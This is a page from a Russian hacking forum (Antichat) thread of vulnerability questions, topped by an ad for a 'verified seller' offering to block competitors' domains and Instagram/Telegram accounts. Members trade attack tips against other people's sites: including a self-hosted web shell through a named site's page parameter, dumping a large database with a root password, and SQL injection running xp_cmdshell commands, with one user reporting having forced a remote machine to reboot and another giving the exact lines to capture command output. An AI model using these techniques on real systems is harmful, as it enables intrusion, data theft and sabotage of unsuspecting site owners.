Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1036 из 1393

1036

Опции темы

Поиск в этой теме

Опции просмотра

#10351

22.11.2009, 14:22

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Цитата:

Сообщение от BlackPanther

можно
залей на какой нить свой сайт шелл и подаставь его
типо http://www.pngbd.com/business/?page=http://site/shell.txt

YuNi|[c
по моему нет, можно через различные программы для sql иньекций гонять на различные базы таблиц

Это фрейм =\

#10352

22.11.2009, 15:08

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Отправить сообщение для [Raz0r] с помощью ICQ

Цитата:

Сообщение от Byrger

Чем можно сдампить большую БД (12кк записей)
sypex не смог
На сервере можно запускать cgi скрипты.

Попробовал

PHP код:


		
			
#!/bin/sh



DB=forum

USER=root

PASS=motynub

HOST=localhost



echo "Content-Type: text/plain"

echo "Content-Disposition: attachment; filename=$DB.sql"

echo



mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -u "$USER" -p"$PASS" -h $HOST $DB

Но вышел еррор 500 (safe_mode = ON)

Попробуй запустить процесс в фоновом режиме, чтобы php не дожидался его завершения.
Вообще Sypex 2.0 может перезапускать себя для работы при safe_mode=on, проверь может ты старый использовал

__________________
<? Raz0r.name — блог о web-безопасности

#10353

22.11.2009, 16:00

DrakonSerg

Познающий

Регистрация: 16.04.2009

Сообщений: 81

Провел на форуме:
1096131

Репутация: 45

пробуем зайти на сайт (точнее на админку) - показывает пустую страницу (и исходный код тоже пуст). Что это за фигня? Можно как нибудь обойти?

#10354

22.11.2009, 16:52

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

Цитата:

Сообщение от Pashkela

Тьфу, не так понял, зачем брутить посимвольно, если можно целиком

Есс-но посимвольно не получиться, там же нет information_schema, чо за вопросы вообще, аж в ступор вводят

Хех Pashkela я знаю что там нету inf_sch, вед если не знаеш префикс таблицы, то бесполезно твои гадания нас чет префиксов. Если бы было возможность брутить хотябы таблицы(не колонки) посимвольно тогда было бы супер.

ЗЫ. В ступорь не вводись ты еще нужень для поддержки мега тулзы

#10355

22.11.2009, 22:54

Glazz

Участник форума

Регистрация: 09.08.2008

Сообщений: 139

Провел на форуме:
560332

Репутация: 15

Имею код вида

Код:

<?php
...
$some = $_POST[some];
$s = mssql_query($some);
и тут уже вывод того, что получилось.
?>

Дело в том, что кавычки экранируются. Как использовать тогда
exec master..xp_cmdshell ???

#10356

22.11.2009, 22:59

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

часто работает exec master..xp_cmdshell [cmd]

__________________
<? Raz0r.name — блог о web-безопасности

#10357

22.11.2009, 23:03

Glazz

Участник форума

Регистрация: 09.08.2008

Сообщений: 139

Провел на форуме:
560332

Репутация: 15

Большое спасибо, вроде, работает, по крайней мере машина ушла в ребут после [shutdown /f /r], но что-то не выдает результат работы запроса(допустим [dir]).

#10358

22.11.2009, 23:10

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

для этого тебе нужно создать таблицу в которую будешь писать вывод с помощью insert into ... execute xp_cmdshell "dir" или просто перенаправлять вывод в файл

__________________
Карфаген должен быть разрушен...

#10359

23.11.2009, 01:43

GenTao

Участник форума

Регистрация: 10.10.2009

Сообщений: 133

Провел на форуме:
143706

Репутация: -1

Цитата:

Сообщение от Scipio

Пример можно(если можно) ? Конкретно ваш(с созданием таблицы и выводом).У меня на своей не выходит.

#10360

23.11.2009, 02:52

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

1 create table xxx (yyy varchar(300));insert into xxx exec master..xp_cmdshell 'dir';
2 ... 'dir >> file.txt';

Страница 1036 из 1393

1036

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход